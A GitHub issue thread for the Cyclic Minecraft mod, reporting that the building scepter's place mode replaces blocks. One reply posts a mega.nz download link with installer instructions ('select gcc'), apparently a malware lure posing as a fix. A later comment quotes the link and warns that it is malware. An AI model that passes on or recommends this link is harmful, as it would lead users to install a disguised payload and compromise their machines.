### ISSUE TITLE
Building scepters (place) works as (replace)

### ISSUE THREAD

**Issue by uhloin** [PrinceOfAmber/Cyclic#2427]
Minecraft Version: 1.20.1

Forge Version: 47.1.100

Mod Version: 1.12.11

Single Player or Server: Single Player 

Describe problem (what you were doing; what happened; what should have happened):

Building scepter (place) works as (replace), it replaces target block and blocks around it on the same height instead of place blocks on the surface of clicked block (on the height +1).

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by HalcyonSeas73** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

DO NOT DO THIS, THIS IS MALWARE
